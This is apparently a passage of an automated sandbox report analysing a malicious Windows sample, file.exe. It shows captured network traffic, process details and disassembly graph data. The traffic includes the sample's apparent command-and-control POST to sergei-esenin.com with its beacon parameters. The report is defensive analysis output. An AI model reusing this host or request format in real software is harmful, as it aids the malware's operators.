                                                                                                                                              Data Ascii: ement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <inp
                                                                                                                                              2024-10-13 23:53:10 UTC887INData Raw: 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61
                                                                                                                                              Data Ascii: <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="bra
                                                                                                                                              2024-10-13 23:53:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              2192.168.2.649713104.21.53.84432488C:\Users\user\Desktop\file.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-10-13 23:53:11 UTC354OUTPOST /api HTTP/1.1
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Cookie: __cf_mw_byp=EP7AiS6jYgLhT0F8cCpf9Uh1CoMcI3bTQDSWovwVusA-1728863590-0.0.1.1-/api
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                              Content-Length: 52
                                                                                                                                              Host: sergei-esenin.com
                                                                                                                                              2024-10-13 23:53:11 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
                                                                                                                                              2024-10-13 23:53:11 UTC825INHTTP/1.1 200 OK
                                                                                                                                              Date: Sun, 13 Oct 2024 23:53:11 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Set-Cookie: PHPSESSID=hiuv9otftse0d93sp7nusjsqf2; expires=Thu, 06 Feb 2025 17:39:50 GMT; Max-Age=9999999; path=/
                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                              Pragma: no-cache
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eE9akebDdZpSXxWmRUHu8oCiTKpWO5TZL227gqiCRZI86WCV5x8%2BLRpLeaNfemqkzIr7rDTcD8Qk3gzHTluh2GgOzdRFzkMMALe9WjhfT70oEYDcEMxtePD9KS5Mm7mb%2F53ltQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8d233f664a29558f-EWR
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              2024-10-13 23:53:11 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                              Data Ascii: aerror #D12
                                                                                                                                              2024-10-13 23:53:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Statistics

                                                                                                                                              CPU Usage

                                                                                                                                              Click to jump to process

                                                                                                                                              Memory Usage

                                                                                                                                              Click to jump to process

                                                                                                                                              High Level Behavior Distribution

                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                              Behavior

                                                                                                                                              Click to jump to process

                                                                                                                                              System Behavior

                                                                                                                                              General

                                                                                                                                              Target ID:0
                                                                                                                                              Start time:19:53:06
                                                                                                                                              Start date:13/10/2024
                                                                                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                              Imagebase:0x560000
                                                                                                                                              File size:2'920'960 bytes
                                                                                                                                              MD5 hash:6D7169D90896F0347F35DA82056FC955
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:5
                                                                                                                                              Start time:19:53:11
                                                                                                                                              Start date:13/10/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2488 -s 1928
                                                                                                                                              Imagebase:0x310000
                                                                                                                                              File size:483'680 bytes
                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:6
                                                                                                                                              Start time:19:53:11
                                                                                                                                              Start date:13/10/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2488 -s 1948
                                                                                                                                              Imagebase:0x310000
                                                                                                                                              File size:483'680 bytes
                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              Disassembly

                                                                                                                                              Reset < >

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:2.7%
                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                Signature Coverage:35.8%
                                                                                                                                                Total number of Nodes:212
                                                                                                                                                Total number of Limit Nodes:15
                                                                                                                                                execution_graph 7755 57d457 7756 5a95b0 LdrInitializeThunk 7755->7756 7757 57d46b 7756->7757 7758 57d4a9 7757->7758 7761 57d4d6 7757->7761 7764 57d47a 7757->7764 7765 5a98f0 7757->7765 7758->7761 7758->7764 7769 5a99d0 7758->7769 7761->7764 7775 5a5bb0 LdrInitializeThunk 7761->7775 7763 57d6db 7767 5a9918 7765->7767 7766 5a997e 7766->7758 7767->7766 7776 5a5bb0 LdrInitializeThunk 7767->7776 7770 5a99f5 7769->7770 7771 5a9a5f 7770->7771 7777 5a5bb0 LdrInitializeThunk 7770->7777 7773 5a9b0e 7771->7773 7778 5a5bb0 LdrInitializeThunk 7771->7778 7773->7761 7775->7763 7776->7766 7777->7771 7778->7773 7939 570b93 7940 5a3220 RtlFreeHeap 7939->7940 7941 570b99 7940->7941 7662 56d110 7666 56d119 7662->7666 7663 56d2ee 7664 56d2e9 7671 5a56e0 7664->7671 7666->7663 7666->7664 7670 572f10 CoInitialize 7666->7670 7674 5a7180 7671->7674 7673 5a56e5 FreeLibrary 7673->7663 7675 5a7189 7674->7675 7675->7673 7942 576f91 7943 576fbc 7942->7943 7944 57702a 7943->7944 7948 5a5bb0 LdrInitializeThunk 7943->7948 7949 5a5bb0 LdrInitializeThunk 7944->7949 7947 5770d1 7948->7944 7949->7947 7676 5a99d0 7677 5a99f5 7676->7677 7678 5a9a5f 7677->7678 7682 5a5bb0 LdrInitializeThunk 7677->7682 7680 5a9b0e 7678->7680 7683 5a5bb0 LdrInitializeThunk 7678->7683 7682->7678 7683->7680 7814 57111d 7815 5a5700 2 API calls 7814->7815 7816 571127 7815->7816 7689 57049b 7693 570227 7689->7693 7690 570455 7692 5a5700 2 API calls 7690->7692 7694 570308 7692->7694 7693->7690 7693->7694 7695 5a5700 7693->7695 7696 5a571b 7695->7696 7697 5a5797 7695->7697 7698 5a578c 7695->7698 7701 5a5729 7695->7701 7696->7697 7696->7698 7696->7701 7700 5a3220 RtlFreeHeap 7697->7700 7698->7690 7699 5a5776 RtlReAllocateHeap 7699->7698 7700->7698 7701->7699 7817 57811b 7822 5a9b60 7817->7822 7819 5781ea 7821 57814a 7821->7819 7828 5a5bb0 LdrInitializeThunk 7821->7828 7824 5a9b85 7822->7824 7823 5a9c9e 7823->7821 7826 5a9bef 7824->7826 7829 5a5bb0 LdrInitializeThunk 7824->7829 7826->7823 7830 5a5bb0 LdrInitializeThunk 7826->7830 7828->7821 7829->7826 7830->7823 7795 577c84 7796 577c89 7795->7796 7797 5a3220 RtlFreeHeap 7796->7797 7798 577c96 7797->7798 7923 5783ce 7924 578403 7923->7924 7925 57846d 7924->7925 7927 5a5bb0 LdrInitializeThunk 7924->7927 7927->7924 7853 5a4a40 7856 5a4a77 7853->7856 7854 5a4ad8 7855 5a4b6d 7854->7855 7862 5a3e30 7854->7862 7856->7854 7861 5a5bb0 LdrInitializeThunk 7856->7861 7860 5a4b29 7860->7855 7866 5a5bb0 LdrInitializeThunk 7860->7866 7861->7854 7864 5a3e45 7862->7864 7863 5a3ed0 7863->7860 7864->7863 7867 5a5bb0 LdrInitializeThunk 7864->7867 7866->7855 7867->7863 7868 578e0d 7869 578e42 7868->7869 7871 578ea4 7869->7871 7874 5a5bb0 LdrInitializeThunk 7869->7874 7873 578fa3 7871->7873 7875 5a5bb0 LdrInitializeThunk 7871->7875 7874->7869 7875->7871 7897 57e30b 7898 57e320 7897->7898 7902 57e34e 7897->7902 7899 5a3e30 LdrInitializeThunk 7898->7899 7899->7902 7900 5a3220 RtlFreeHeap 7901 57e5a2 7900->7901 7903 5a3e30 LdrInitializeThunk 7902->7903 7909 57e560 7902->7909 7906 57e41c 7903->7906 7904 5a3e30 LdrInitializeThunk 7904->7906 7905 5a3220 RtlFreeHeap 7905->7906 7906->7904 7906->7905 7907 57e56a 7906->7907 7906->7909 7908 5a3220 RtlFreeHeap 7907->7908 7908->7909 7909->7900 7787 579809 7790 5a9410 7787->7790 7789 579848 7792 5a9430 7790->7792 7791 5a954e 7791->7789 7792->7791 7794 5a5bb0 LdrInitializeThunk 7792->7794 7794->7791 7831 576536 7834 57655c 7831->7834 7833 5768a4 7833->7833 7835 5a32c0 7834->7835 7836 5a32f0 7835->7836 7841 5a333e 7836->7841 7843 5a5bb0 LdrInitializeThunk 7836->7843 7838 5a3220 RtlFreeHeap 7840 5a3492 7838->7840 7839 5a33fe 7839->7838 7840->7833 7841->7839 7841->7840 7844 5a5bb0 LdrInitializeThunk 7841->7844 7843->7841 7844->7839 7650 56edb5 7651 56edd0 7650->7651 7651->7651 7654 56fca0 7651->7654 7656 56fcdc 7654->7656 7655 56ef70 7656->7655 7658 5a3220 7656->7658 7659 5a32ac 7658->7659 7660 5a32a2 RtlFreeHeap 7658->7660 7661 5a3236 7658->7661 7659->7655 7660->7659 7661->7660 7882 576ebf 7886 576a52 7882->7886 7884 5a3220 RtlFreeHeap 7884->7886 7886->7882 7886->7884 7887 5a3630 7886->7887 7891 5a5bb0 LdrInitializeThunk 7886->7891 7888 5a36be 7887->7888 7889 5a3640 7887->7889 7888->7886 7889->7888 7892 5a5bb0 LdrInitializeThunk 7889->7892 7891->7886 7892->7888 7684 5a95b0 7686 5a95d0 7684->7686 7685 5a970e 7686->7685 7688 5a5bb0 LdrInitializeThunk 7686->7688 7688->7685 7845 57d93c 7846 5a98f0 LdrInitializeThunk 7845->7846 7847 57d952 7846->7847 7919 574b3c 7921 574b40 7919->7921 7920 5842b0 LdrInitializeThunk 7922 575a97 7920->7922 7921->7920 7921->7922 7931 573be2 7932 573be9 7931->7932 7933 573ea3 7932->7933 7936 573e36 7932->7936 7937 5a5bb0 LdrInitializeThunk 7932->7937 7933->7936 7938 5a5bb0 LdrInitializeThunk 7933->7938 7937->7933 7938->7936 7810 57d961 7811 57d96e 7810->7811 7812 5a99d0 LdrInitializeThunk 7811->7812 7813 57d983 7812->7813 7813->7813 7702 572fe0 7704 572ffa 7702->7704 7703 573377 7704->7702 7704->7703 7705 5a3220 RtlFreeHeap 7704->7705 7706 5734cc 7704->7706 7705->7704 7723 589510 7706->7723 7708 573674 7731 589bb0 7708->7731 7724 58956e 7723->7724 7724->7724 7735 5a9760 7724->7735 7726 589908 7726->7708 7727 5898f7 7727->7726 7739 586cc0 7727->7739 7729 589768 7729->7726 7729->7727 7729->7729 7730 5a9760 LdrInitializeThunk 7729->7730 7730->7727 7732 589c51 7731->7732 7748 5842b0 7732->7748 7734 589e05 7736 5a9780 7735->7736 7737 5a989e 7736->7737 7742 5a5bb0 LdrInitializeThunk 7736->7742 7737->7729 7743 5a95b0 7739->7743 7741 586d15 7742->7737 7745 5a95d0 7743->7745 7744 5a970e 7744->7741 7745->7744 7747 5a5bb0 LdrInitializeThunk 7745->7747 7747->7744 7749 5842c0 7748->7749 7750 5a9760 LdrInitializeThunk 7749->7750 7752 584319 7750->7752 7751 5843d7 7751->7734 7752->7751 7753 586cc0 LdrInitializeThunk 7752->7753 7753->7751 7893 57d760 7894 57d773 7893->7894 7895 5a95b0 LdrInitializeThunk 7894->7895 7896 57d92d 7895->7896 7754 572f6f CoInitializeSecurity 7848 5a3920 7850 5a393c 7848->7850 7849 5a3a42 7850->7849 7852 5a5bb0 LdrInitializeThunk 7850->7852 7852->7849 7799 5768ab 7801 5768aa 7799->7801 7801->7799 7802 5a34d0 7801->7802 7803 5a359e 7802->7803 7804 5a34e1 7802->7804 7803->7801 7804->7803 7806 5a5bb0 LdrInitializeThunk 7804->7806 7806->7803 7876 570228 7877 570455 7876->7877 7880 570242 7876->7880 7881 570308 7876->7881 7879 5a5700 2 API calls 7877->7879 7878 5a5700 2 API calls 7878->7877 7879->7881 7880->7877 7880->7878 7880->7881

                                                                                                                                                Executed Functions

                                                                                                                                                Function 0056FCA0 Relevance: 6.6, Strings: 5, Instructions: 373COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 236 56fca0-56fcda 237 56fcdc-56fcdf 236->237 238 56fd0b-56fe22 236->238 239 56fce0-56fd09 call 572690 237->239 240 56fe24 238->240 241 56fe5b-56fe8c 238->241 239->238 245 56fe30-56fe59 call 572760 240->245 242 56feb6-56fec5 call 570b50 241->242 243 56fe8e-56fe8f 241->243 251 56feca-56fecf 242->251 246 56fe90-56feb4 call 572700 243->246 245->241 246->242 254 56ffe4-56ffe6 251->254 255 56fed5-56fef8 251->255 258 5701b1-5701bb 254->258 256 56fefa 255->256 257 56ff2b-56ff2d 255->257 259 56ff00-56ff29 call 5727e0 256->259 260 56ff30-56ff3a 257->260 259->257 262 56ff41-56ff49 260->262 263 56ff3c-56ff3f 260->263 264 5701a2-5701ad call 5a3220 262->264 265 56ff4f-56ff76 262->265 263->260 263->262 264->258 267 56ffab-56ffb5 265->267 268 56ff78 265->268 271 56ffb7-56ffbb 267->271 272 56ffeb 267->272 270 56ff80-56ffa9 call 572840 268->270 270->267 276 56ffc7-56ffcb 271->276 274 56ffed-56ffef 272->274 277 56fff5-57002c 274->277 278 57019a 274->278 276->278 280 56ffd1-56ffd8 276->280 281 57002e-57002f 277->281 282 57005b-570065 277->282 278->264 283 56ffde 280->283 284 56ffda-56ffdc 280->284 285 570030-570059 call 5728a0 281->285 286 570067-57006f 282->286 287 5700a4 282->287 288 56ffc0-56ffc5 283->288 289 56ffe0-56ffe2 283->289 284->283 285->282 291 570087-57008b 286->291 292 5700a6-5700a8 287->292 288->274 288->276 289->288 291->278 295 570091-570098 291->295 292->278 293 5700ae-5700c5 292->293 296 5700c7 293->296 297 5700fb-570102 293->297 298 57009e 295->298 299 57009a-57009c 295->299 300 5700d0-5700f9 call 572900 296->300 301 570104-57010d 297->301 302 570130-57013c 297->302 303 570080-570085 298->303 304 5700a0-5700a2 298->304 299->298 300->297 306 570117-57011b 301->306 307 5701c2-5701c7 302->307 303->291 303->292 304->303 306->278 309 57011d-570124 306->309 307->264 310 570126-570128 309->310 311 57012a 309->311 310->311 312 570110-570115 311->312 313 57012c-57012e 311->313 312->306 314 570141-570143 312->314 313->312 314->278 315 570145-57015b 314->315 315->307 316 57015d-57015f 315->316 317 570163-570166 316->317 318 5701bc 317->318 319 570168-570188 call 572030 317->319 318->307 322 570192-570198 319->322 323 57018a-570190 319->323 322->307 323->317 323->322
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.2248162687.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248236350.00000000005C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248256616.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248407211.0000000000724000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248425898.0000000000726000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248446165.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248466420.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.0000000000745000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248530529.0000000000749000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248549683.000000000074B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248574811.000000000075E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248595402.000000000075F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248617778.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248634549.0000000000763000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248659798.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248678110.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248695577.0000000000775000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248713489.0000000000776000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248735979.000000000077E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248756195.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248773348.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248790104.0000000000789000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248814586.000000000079E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248833289.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248856584.00000000007A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248875471.00000000007A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248892861.00000000007A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248927737.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248965509.00000000007B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248997672.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249017938.00000000007B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249035947.00000000007BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249054287.00000000007C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249071697.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249089577.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249107541.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249131346.00000000007E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249149981.00000000007E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249169817.00000000007F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249188404.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249239425.0000000000847000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249259015.0000000000848000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000849000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249276510.0000000000853000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249317293.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249337477.0000000000861000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_560000_file.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: EP7AiS6jYgLhT0F8cCpf9Uh1CoMcI3bTQDSWovwVusA-1728863590-0.0.1.1-/api$J|BJ$V$VY^_$t
                                                                                                                                                • API String ID: 0-2031093078
                                                                                                                                                • Opcode ID: fb4ad99238873ca2c9fd01eb5014e03612c4abcb77a5adb63bf1ffc5a0713ce3
                                                                                                                                                • Instruction ID: dee09007266edcf498de45ef25a06e30c5c1e2ca4faf6dcb539aab0f99f88995
                                                                                                                                                • Opcode Fuzzy Hash: fb4ad99238873ca2c9fd01eb5014e03612c4abcb77a5adb63bf1ffc5a0713ce3
                                                                                                                                                • Instruction Fuzzy Hash: 82D166745083909BD320DF14A89462FBFE1BB92B44F58981CF4C98B292C336DD49EB92
                                                                                                                                                Function 005A5700 Relevance: 1.6, APIs: 1, Instructions: 69memoryCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 340 5a5700-5a5714 341 5a571b-5a5722 340->341 342 5a5729-5a574a 340->342 343 5a578c-5a5795 call 5a31a0 340->343 344 5a57b2 340->344 345 5a57b0 340->345 346 5a5797-5a57a5 call 5a3220 340->346 341->342 341->344 341->345 341->346 348 5a574c-5a574f 342->348 349 5a5776-5a578a RtlReAllocateHeap 342->349 347 5a57b4-5a57b9 343->347 344->347 345->344 346->345 353 5a5750-5a5774 call 5a5b30 348->353 349->347 353->349
                                                                                                                                                APIs
                                                                                                                                                • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 005A5784
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.2248189288.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.2248162687.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248236350.00000000005C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248256616.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248407211.0000000000724000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248425898.0000000000726000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248446165.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248466420.000000000073B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248484421.0000000000745000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248530529.0000000000749000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248549683.000000000074B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248574811.000000000075E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248595402.000000000075F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248617778.0000000000762000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248634549.0000000000763000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248659798.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248678110.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248695577.0000000000775000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248713489.0000000000776000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248735979.000000000077E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248756195.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248773348.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248790104.0000000000789000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248814586.000000000079E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248833289.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248856584.00000000007A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248875471.00000000007A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248892861.00000000007A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248927737.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248965509.00000000007B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2248997672.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249017938.00000000007B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.2249035947.00000000007BB000.00000040.00000001.01000000.00000003.sdmpDownload File
